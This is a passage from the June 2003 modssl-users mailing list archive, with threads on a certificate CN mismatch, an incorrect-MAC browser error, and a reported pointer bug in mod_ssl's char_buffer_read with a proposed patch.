>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>Diese E-mail ist eine private und pers=F6nliche Kommunikation.=20
>Sie hat keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der=20
>SWX Swiss Exchange. This e-mail is of a private and personal=20
>nature. It is not related to the exchange or business=20
>activities of the SWX Swiss Exchange. Le pr=E9sent e-mail est un=20
>message priv=E9 et personnel, sans rapport avec l'activit=E9=20
>boursi=E8re de la SWX Swiss Exchange
>
>=20
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat =
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange. This e-mail is of a private and personal nature. It is not =
related to the exchange or business activities of the SWX Swiss =
Exchange. Le pr=E9sent e-mail est un message priv=E9 et personnel, sans =
rapport avec l'activit=E9 boursi=E8re de la SWX Swiss Exchange.=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  2 22:43:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7ABEBA8946; Mon,  2 Jun 2003 22:43:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from unigeek.com (unigeek.com [64.240.156.245])
	by master.modssl.org (Postfix) with SMTP id 6610EA8935
	for ; Mon,  2 Jun 2003 22:42:59 +0200 (CEST)
Received: (qmail 32006 invoked from network); 2 Jun 2003 20:42:56 -0000
Received: from 24-136-9-34.na.21stcentury.net (HELO ?192.168.1.101?) (24.136.9.34)
  by unigeek.com with SMTP; 2 Jun 2003 20:42:56 -0000
Subject: Erro Code: -8182
From: Ronald Petty 
To: modssl-users@modssl.org
Cc: ron.petty@unigeek.com
Content-Type: text/plain
Organization: UNIGEEK
Message-Id: <1054586406.1237.160.camel@laptop.unigeek.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 
Date: 02 Jun 2003 15:40:07 -0500
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ronald Petty 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I get the follow error in my browser 

"Could not establish an encrypted connection because certificate
presented by test.example.dom is invalid or corrupted.  Error Code: 
-8182"

when I go to my server via https.  I looked in the archive and found
black magic like

	"restart your browser"

I tried this spell, and alas, to no avail.  

This happened to me before and it worked by restarting the browser. 
Needless to say I don't like the idea of people having to do that.  And
better when I click on the ok button (even though it is really not ok) I
get this in my logs




[02/Jun/2003 15:25:47 01074] [info]  Connection to child 5 established
(server test.example.dom:443, client x.x.x.x)
[02/Jun/2003 15:25:47 01074] [info]  Seeding PRNG with 1160 bytes of
entropy




[02/Jun/2003 15:29:12 01074] [error] SSL handshake failed (server
test.example.dom:443, client x.x.x.x) (OpenSSL library error follows)
[02/Jun/2003 15:29:12 01074] [error] OpenSSL: error:14094412:SSL
routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint:
Subject CN in certificate not server name or identical to CA!?]


I have changed the client and the server name for my own security (don't
know if it matters).  I heard that "CN in certificate not server name or
identical to CA!?" means dns is messed up, however DNS is working fine
for me (far as I can tell).  I can pop/ssh/http to the test.example.dom
just fine.  (No its not set in my /etc/host)

Any idea at what I am doing wrong?  I have never done this before so
please forgive my newby ways.

Thanks
Ron


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  2 22:48:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1D4ABA8946; Mon,  2 Jun 2003 22:48:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-nj03.iplex.ssmb.com (mail2.ssmb.com [199.67.141.25])
	by master.modssl.org (Postfix) with ESMTP id 829B1A8935
	for ; Mon,  2 Jun 2003 22:48:37 +0200 (CEST)
Received: from imbarc-nj02.nj.ssmb.com (imbarc-nj02-2 [150.110.177.216])
	by imbaspam-nj03.iplex.ssmb.com (8.12.9/8.12.9/SSMB_EXT/evision: 1.20 $) with ESMTP id h52KmY2M003643
	for ; Mon, 2 Jun 2003 16:48:35 -0400 (EDT)
Received: from mailhub.nj.ssmb.com (mailhub.nj.ssmb.com [150.110.242.13])
	by imbarc-nj02.nj.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h52KmOKK017312
	for ; Mon, 2 Jun 2003 16:48:24 -0400 (EDT)
Received: from exnjsm02.nam.nsroot.net (exnjsm02.nam.nsroot.net [150.110.188.173])
	by mailhub.nj.ssmb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id QAA14033
	for ; Mon, 2 Jun 2003 16:48:23 -0400 (EDT)
content-class: urn:content-classes:message
Subject: RE: Erro Code: -8182
Date: Mon, 2 Jun 2003 16:48:09 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FC65@exchny43.ny.ssmb.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Erro Code: -8182
X-MimeOLE: Produced By Microsoft Exchange V6.0.6334.0
Thread-Index: AcMpR66EtSHWupU6EdefGQBQi+OCCgAAGIrw
From: "Nauman, Ahmed [IT]" 
To: 
X-Scanned-By: MIMEDefang 2.33 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ronald,

The problem looks like your server SSL certificate does not have your
server name say www.yoursite.com as CN=3D"www.yoursite.com" in Subject
Name. that is what bother client and server sides are showing in
messages and logs. Can you please confirm if this is correct ?

Regards
Nauman

-----Original Message-----
From: Ronald Petty [mailto:ron.petty@unigeek.com]
Sent: Monday, June 02, 2003 4:40 PM
To: modssl-users@modssl.org
Cc: ron.petty@unigeek.com
Subject: Erro Code: -8182


I get the follow error in my browser=20

"Could not establish an encrypted connection because certificate
presented by test.example.dom is invalid or corrupted.  Error Code:=20
-8182"

when I go to my server via https.  I looked in the archive and found
black magic like

	"restart your browser"

I tried this spell, and alas, to no avail. =20

This happened to me before and it worked by restarting the browser.=20
Needless to say I don't like the idea of people having to do that.  And
better when I click on the ok button (even though it is really not ok) I
get this in my logs




[02/Jun/2003 15:25:47 01074] [info]  Connection to child 5 established
(server test.example.dom:443, client x.x.x.x)
[02/Jun/2003 15:25:47 01074] [info]  Seeding PRNG with 1160 bytes of
entropy




[02/Jun/2003 15:29:12 01074] [error] SSL handshake failed (server
test.example.dom:443, client x.x.x.x) (OpenSSL library error follows)
[02/Jun/2003 15:29:12 01074] [error] OpenSSL: error:14094412:SSL
routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint:
Subject CN in certificate not server name or identical to CA!?]


I have changed the client and the server name for my own security (don't
know if it matters).  I heard that "CN in certificate not server name or
identical to CA!?" means dns is messed up, however DNS is working fine
for me (far as I can tell).  I can pop/ssh/http to the test.example.dom
just fine.  (No its not set in my /etc/host)

Any idea at what I am doing wrong?  I have never done this before so
please forgive my newby ways.

Thanks
Ron


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  3 01:37:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C55D1A8962; Tue,  3 Jun 2003 01:37:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from unigeek.com (unigeek.com [64.240.156.245])
	by master.modssl.org (Postfix) with SMTP id 09A7EA893B
	for ; Tue,  3 Jun 2003 01:37:49 +0200 (CEST)
Received: (qmail 32201 invoked from network); 2 Jun 2003 23:37:46 -0000
Received: from 24-136-9-34.na.21stcentury.net (HELO ?192.168.1.101?) (24.136.9.34)
  by unigeek.com with SMTP; 2 Jun 2003 23:37:46 -0000
Subject: RE: Erro Code: -8182
From: Ronald Petty 
To: modssl-users@modssl.org
In-Reply-To: <9F1AE1497901D71185A20002A56B9B2601B0FC65@exchny43.ny.ssmb.com>
References: <9F1AE1497901D71185A20002A56B9B2601B0FC65@exchny43.ny.ssmb.com>
Content-Type: text/plain
Organization: UNIGEEK
Message-Id: <1054596894.1237.164.camel@laptop.unigeek.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 
Date: 02 Jun 2003 18:34:54 -0500
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ronald Petty 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am trying to create my own certificate using my own CA.  I used the
example in the FAQ

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC29

So what file is "really my certificate", is the server.key?  or the
ca.key?

I made a key using

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28   

What file should I be checking?

Ron


On Mon, 2003-06-02 at 15:48, Nauman, Ahmed [IT] wrote:
> Ronald,
> 
> The problem looks like your server SSL certificate does not have your
> server name say www.yoursite.com as CN="www.yoursite.com" in Subject
> Name. that is what bother client and server sides are showing in
> messages and logs. Can you please confirm if this is correct ?
> 
> Regards
> Nauman
> 
> -----Original Message-----
> From: Ronald Petty [mailto:ron.petty@unigeek.com]
> Sent: Monday, June 02, 2003 4:40 PM
> To: modssl-users@modssl.org
> Cc: ron.petty@unigeek.com
> Subject: Erro Code: -8182
> 
> 
> I get the follow error in my browser 
> 
> "Could not establish an encrypted connection because certificate
> presented by test.example.dom is invalid or corrupted.  Error Code: 
> -8182"
> 
> when I go to my server via https.  I looked in the archive and found
> black magic like
> 
> 	"restart your browser"
> 
> I tried this spell, and alas, to no avail.  
> 
> This happened to me before and it worked by restarting the browser. 
> Needless to say I don't like the idea of people having to do that.  And
> better when I click on the ok button (even though it is really not ok) I
> get this in my logs
> 
> 
> 
> 
> [02/Jun/2003 15:25:47 01074] [info]  Connection to child 5 established
> (server test.example.dom:443, client x.x.x.x)
> [02/Jun/2003 15:25:47 01074] [info]  Seeding PRNG with 1160 bytes of
> entropy
> 
> 
> 
> 
> [02/Jun/2003 15:29:12 01074] [error] SSL handshake failed (server
> test.example.dom:443, client x.x.x.x) (OpenSSL library error follows)
> [02/Jun/2003 15:29:12 01074] [error] OpenSSL: error:14094412:SSL
> routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint:
> Subject CN in certificate not server name or identical to CA!?]
> 
> 
> I have changed the client and the server name for my own security (don't
> know if it matters).  I heard that "CN in certificate not server name or
> identical to CA!?" means dns is messed up, however DNS is working fine
> for me (far as I can tell).  I can pop/ssh/http to the test.example.dom
> just fine.  (No its not set in my /etc/host)
> 
> Any idea at what I am doing wrong?  I have never done this before so
> please forgive my newby ways.
> 
> Thanks
> Ron
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  3 01:56:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 24A26A8962; Tue,  3 Jun 2003 01:56:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from unigeek.com (unigeek.com [64.240.156.245])
	by master.modssl.org (Postfix) with SMTP id 8836DA8939
	for ; Tue,  3 Jun 2003 01:56:10 +0200 (CEST)
Received: (qmail 32224 invoked from network); 2 Jun 2003 23:56:08 -0000
Received: from 24-136-9-34.na.21stcentury.net (HELO ?192.168.1.101?) (24.136.9.34)
  by unigeek.com with SMTP; 2 Jun 2003 23:56:08 -0000
Subject: RE: Erro Code: -8182
From: Ronald Petty 
To: modssl-users@modssl.org
In-Reply-To: <9F1AE1497901D71185A20002A56B9B2601B0FC65@exchny43.ny.ssmb.com>
References: <9F1AE1497901D71185A20002A56B9B2601B0FC65@exchny43.ny.ssmb.com>
Content-Type: text/plain
Organization: UNIGEEK
Message-Id: <1054597995.1237.169.camel@laptop.unigeek.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 
Date: 02 Jun 2003 18:53:16 -0500
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ronald Petty 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

OK, I think I figured it out.  It really is what the error says (Imagine
that).  I made myself a CA, then made another certificate.  The other
certificate was exactly the same as the CA one.  

Now it works using ca.key and ca.crt.  However now I have two questions.

1)  Why can't you have two exact same certs?
2)  If the can't be the same, what has to be different?
.. (let me sneak in a third question)
3)  Is it safe to use the CA certs on a server?  Or should I use a
machine that is not used via ssl normally and then copy the other certs
over?
.. (one more :))
4)  Is there more documentation for this these kind of questions?  Did I
miss it in the man page?

Thanks everyone!
Ron


On Mon, 2003-06-02 at 15:48, Nauman, Ahmed [IT] wrote:
> Ronald,
> 
> The problem looks like your server SSL certificate does not have your
> server name say www.yoursite.com as CN="www.yoursite.com" in Subject
> Name. that is what bother client and server sides are showing in
> messages and logs. Can you please confirm if this is correct ?
> 
> Regards
> Nauman
> 
> -----Original Message-----
> From: Ronald Petty [mailto:ron.petty@unigeek.com]
> Sent: Monday, June 02, 2003 4:40 PM
> To: modssl-users@modssl.org
> Cc: ron.petty@unigeek.com
> Subject: Erro Code: -8182
> 
> 
> I get the follow error in my browser 
> 
> "Could not establish an encrypted connection because certificate
> presented by test.example.dom is invalid or corrupted.  Error Code: 
> -8182"
> 
> when I go to my server via https.  I looked in the archive and found
> black magic like
> 
> 	"restart your browser"
> 
> I tried this spell, and alas, to no avail.  
> 
> This happened to me before and it worked by restarting the browser. 
> Needless to say I don't like the idea of people having to do that.  And
> better when I click on the ok button (even though it is really not ok) I
> get this in my logs
> 
> 
> 
> 
> [02/Jun/2003 15:25:47 01074] [info]  Connection to child 5 established
> (server test.example.dom:443, client x.x.x.x)
> [02/Jun/2003 15:25:47 01074] [info]  Seeding PRNG with 1160 bytes of
> entropy
> 
> 
> 
> 
> [02/Jun/2003 15:29:12 01074] [error] SSL handshake failed (server
> test.example.dom:443, client x.x.x.x) (OpenSSL library error follows)
> [02/Jun/2003 15:29:12 01074] [error] OpenSSL: error:14094412:SSL
> routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint:
> Subject CN in certificate not server name or identical to CA!?]
> 
> 
> I have changed the client and the server name for my own security (don't
> know if it matters).  I heard that "CN in certificate not server name or
> identical to CA!?" means dns is messed up, however DNS is working fine
> for me (far as I can tell).  I can pop/ssh/http to the test.example.dom
> just fine.  (No its not set in my /etc/host)
> 
> Any idea at what I am doing wrong?  I have never done this before so
> please forgive my newby ways.
> 
> Thanks
> Ron
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  4 22:13:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 83B8FA896C; Wed,  4 Jun 2003 22:13:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from delorean.solidusdesign.com (delorean.solidusdesign.com [65.42.172.208])
	by master.modssl.org (Postfix) with SMTP id CDD15A8938
	for ; Wed,  4 Jun 2003 22:10:37 +0200 (CEST)
Received: (qmail 21526 invoked by uid 1001); 4 Jun 2003 20:10:36 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 4 Jun 2003 20:10:36 -0000
Date: Wed, 4 Jun 2003 16:10:35 -0400 (EDT)
From: Kevin DeGraaf 
To: modssl-users@modssl.org
Subject: incorrect MAC
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin DeGraaf 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I set up a mod_ssl server using:

  Apache 1.3.27
  mm 1.3.0
  mod_ssl 2.8.14
  OpenSSL 0.9.7b
  Slackware Linux 8.1

When I (attempt to) connect, Mozilla gives me this error:
"secure2.solidusdesign.com received a message with an incorrect Message
Authentication Code".  How do I fix this?

Here is the procedure I used:

OpenSSL: ./config && make install

mm: ./configure --disable-shared && make install

mod_ssl: ./configure --with-apache=../apache_1.3.27

Apache:

SSL_BASE=../openssl-0.9.7b \
EAPI_MM=../mm-1.3.0 \
./configure \
  --prefix=/usr/local/apache \
  --enable-module=so \
  --enable-module=ssl \
  --enable-shared=ssl \
  --enable-shared=rewrite \
  --enable-shared=speling \
  --disable-module=userdir \
  --htdocsdir=/var/www/htdocs \
  --cgidir=/var/www/cgi-bin \
  --runtimedir=/var/www/runtime \
  --logfiledir=/var/www/logs \
  --server-uid=apache \
  --server-gid=apache

--
Kevin DeGraaf



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  6 21:08:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4038FA8966; Fri,  6 Jun 2003 21:08:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from amd.dss.bc.ca (h24-87-69-84.vc.shawcable.net [24.87.69.84])
	by master.modssl.org (Postfix) with ESMTP id 33F82A8942
	for ; Fri,  6 Jun 2003 21:08:37 +0200 (CEST)
Received: from amd.dss.bc.ca (localhost.dss.bc.ca [127.0.0.1])
	by amd.dss.bc.ca (8.11.6/8.11.6) with ESMTP id h56J9JF56089
	for ; Fri, 6 Jun 2003 12:09:20 -0700 (PDT)
	(envelope-from brachman@amd.dss.bc.ca)
Message-Id: <200306061909.h56J9JF56089@amd.dss.bc.ca>
X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
To: modssl-users@modssl.org
Subject: Possible mod_ssl bug (ssl_io_input_read)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 06 Jun 2003 12:09:19 -0700
From: Barry Brachman 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Barry Brachman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi --

I am developing a new Apache 2.0 module and I have encountered what I think
to be a bug in mod_ssl.  I have been unable to find any reports of a similar
problem.  I think this is because I am using AP_MODE_SPECULATIVE, which is
a bit unusual, so maybe no one else has run into this case yet.


Brief description of the problem:
  The problem is related to the use of both AP_MODE_SPECULATIVE and mod_ssl.
  Under certain conditions, ssl_engine_io.c:ssl_io_input_read() and its helper
  function char_buffer_read() might not handle "inctx->cbuf" properly.  In
  particular, this can lead to the inctx->cbuf.value pointer being assigned an
  incorrect value, after which Apache may segmentation fault.


Software Environment:
  I am running Apache 2.0.4[56] and using the mod_ssl that comes with it.
  The compile and runtime environments that I have been working with are
  Redhat 2.4.18-3 and FreeBSD 4.5.  I am using the standard system development
  tools etc.

  I am configuring Apache like so:
  % ./configure --prefix=/usr/local/apache2-2.0.45 --with-module=aaa:auth_dacs 
\
    --enable-ssl
  % ./httpd -l
  Compiled in modules: core.c mod_access.c mod_auth.c mod_include.c \
    mod_log_config.c mod_env.c mod_setenvif.c mod_ssl.c prefork.c \
    http_core.c mod_mime.c mod_auth_dacs.c mod_status.c mod_autoindex.c \
    mod_asis.c mod_cgi.c mod_negotiation.c mod_dir.c mod_imap.c mod_actions.c \
    mod_userdir.c mod_alias.c mod_so.c

  mod_auth_dacs.c is my new module.  The only thing unusual about it, I think,
  is that it makes the following call:

     rv = ap_get_brigade(r->input_filters, bb, AP_MODE_SPECULATIVE,
                            APR_BLOCK_READ, need);

Conditions:
  The conditions under which this happens are browser dependent.  It doesn't
  seem to ever happen with Mozilla 1.3 or Netscape 4.78 but it does happen
  reproducibly with IE 6.0 and Netscape Navigator 3.01.  I think this is
  related to the way they do SSL I/O because while debugging I see that the
  SSL buffer processing in mod_ssl is slightly different with IE 6.0.

  To trigger the bug, I invoke a POST method using https from IE 6.0, which
  leads mod_auth_dacs to make the function call that appears above.

  The bug does not seem to be present when SSL is not used.


Detailed description of the problem:
  The problem seems to occur if an AP_MODE_SPECULATIVE mode read operation
  is done when ssl_io_input_read() already has input buffered in inctx->cbuf.

  Here is ssl_engine_io.c:char_buffer_read():

  static int char_buffer_read(char_buffer_t *buffer, char *in, int inl)
  {
    if (!buffer->length) {
        return 0;
    }
    if (buffer->length > inl) {
        /* we have have enough to fill the caller's buffer */
        memcpy(in, buffer->value, inl);
        buffer->value += inl;
        buffer->length -= inl;
    }
    else {
        /* swallow remainder of the buffer */
        memcpy(in, buffer->value, buffer->length);
        inl = buffer->length;
        buffer->value = NULL;
        buffer->length = 0;
    }
    return inl;
  }

 If there is not enough buffered input, char_buffer_read() sets
 buffer->value to NULL.  Then, when it returns to ssl_io_input_read():
     if ((bytes = char_buffer_read(&inctx->cbuf, buf, wanted))) {
        *len = bytes;
        if (inctx->mode == AP_MODE_SPECULATIVE) {
            /* We want to rollback this read. */
            inctx->cbuf.value -= bytes;
            inctx->cbuf.length += bytes;
            return APR_SUCCESS;
        }

  it will do "inctx->cbuf.value -= bytes" which sets cbuf.value to an invalid
  pointer.  When the pointer is dereferenced later, a segmentation fault 
  occurs.  So at the very least, it would seem that the code should always
  avoid doing this.

  Also, I found that in char_buffer_read(), "in" and "buffer->value" may
  overlap, so memmove() should probably be used instead of memcpy().

Proposed fix:
  I have not tested this heavily, but it does seem to solve the problem in
  my test case (and my module then works with IE 6.0 and Navigator 3.01, as
  well as Mozilla and Netscape 4.78).

  I changed ssl_io_input_read() like so:

    if ((bytes = char_buffer_read(inctx, buf, wanted))) {
        *len = bytes;
        if (inctx->mode == AP_MODE_SPECULATIVE) {
            return APR_SUCCESS;
        }

  And I changed char_buffer_read() like so:

  static int char_buffer_read(bio_filter_in_ctx_t *inctx, char *in, int inl)
  {
    char_buffer_t *buffer = &inctx->cbuf;

    if (!buffer->length) {
        return 0;
    }

    if (buffer->length > inl) {
        /* we have have enough to fill the caller's buffer */
        memmove(in, buffer->value, inl);
        buffer->value += inl;
        buffer->length -= inl;
    }
    else {
        /* swallow remainder of the buffer */
        memmove(in, buffer->value, buffer->length);
        inl = buffer->length;
        if (inctx->mode == AP_MODE_SPECULATIVE) {
          buffer->value = in;
        }
        else {
          buffer->value = NULL;
          buffer->length = 0;
        }
    }

    return inl;
  }

I would be happy to provide any other details.  I can also show what
happens when I step through the code with gdb.

Thank you for your attention.

Barry

** Barry Brachman
** Distributed Systems Software, Inc.
** brachman@dss.bc.ca



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  6 21:12:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B071DA8945; Fri,  6 Jun 2003 21:12:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (bistromath2.cs.Virginia.EDU [128.143.137.216])
	by master.modssl.org (Postfix) with ESMTP id 51158A8935
	for ; Fri,  6 Jun 2003 21:12:08 +0200 (CEST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h56JBamJ010293;
	Fri, 6 Jun 2003 15:11:36 -0400
Date: Fri, 6 Jun 2003 15:11:36 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: Barry Brachman 
Cc: modssl-users@modssl.org
Subject: Re: Possible mod_ssl bug (ssl_io_input_read)
In-Reply-To: <200306061909.h56J9JF56089@amd.dss.bc.ca>
Message-ID: 
References: <200306061909.h56J9JF56089@amd.dss.bc.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 6 Jun 2003, Barry Brachman wrote:

>
> I am developing a new Apache 2.0 module and I have encountered what I think
> to be a bug in mod_ssl.  I have been unable to find any reports of a similar
> problem.  I think this is because I am using AP_MODE_SPECULATIVE, which is

I have forwarded this on to dev@httpd.apache.org, which is where
development discussions for mod_ssl for Apache 2.0.x occur.  I'll try to
forward back any relevant replies if I have time, but I suggest you
subscribe to that list to listen for them yourself.

Thanks for your report!

--Cliff

---------------------------------------------------------------
   Cliff Woolley
   jwoolley@apache.org
   Apache HTTP Server Project
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  6 22:36:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7CE38A8945; Fri,  6 Jun 2003 22:36:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from delorean.solidusdesign.com (delorean.solidusdesign.com [65.42.172.208])
	by master.modssl.org (Postfix) with SMTP id AB7C5A8935
	for ; Fri,  6 Jun 2003 22:36:03 +0200 (CEST)
Received: (qmail 26642 invoked by uid 1001); 6 Jun 2003 20:36:00 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 6 Jun 2003 20:36:00 -0000
Date: Fri, 6 Jun 2003 16:36:00 -0400 (EDT)
From: Kevin DeGraaf 
To: modssl-users@modssl.org
Subject: Re: incorrect MAC
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin DeGraaf 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I wrote:

> When I (attempt to) connect, Mozilla gives me this error:
> "secure2.solidusdesign.com received a message with an incorrect Message
> Authentication Code".  How do I fix this?

I fixed the problem by upgrading from a dummy SSL cert to a real one.

But really, guys, many thanks to everyone who posted useful suggestions.
The list's help was invaluable in getting to the bottom of this matter.
I can't imagine what I would have done without such a caring, useful group
of experts.  I'll be sure to return here in the future if I ever have a
problem with mod_ssl, since you've all bent over backwards to get me an
answer on this one.  Thanks again!

--
Kevin DeGraaf

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun  7 06:39:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2039DA8959; Sat,  7 Jun 2003 06:39:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (bistromath2.cs.Virginia.EDU [128.143.137.216])
	by master.modssl.org (Postfix) with ESMTP id A9BF7A8937
	for ; Sat,  7 Jun 2003 06:39:32 +0200 (CEST)
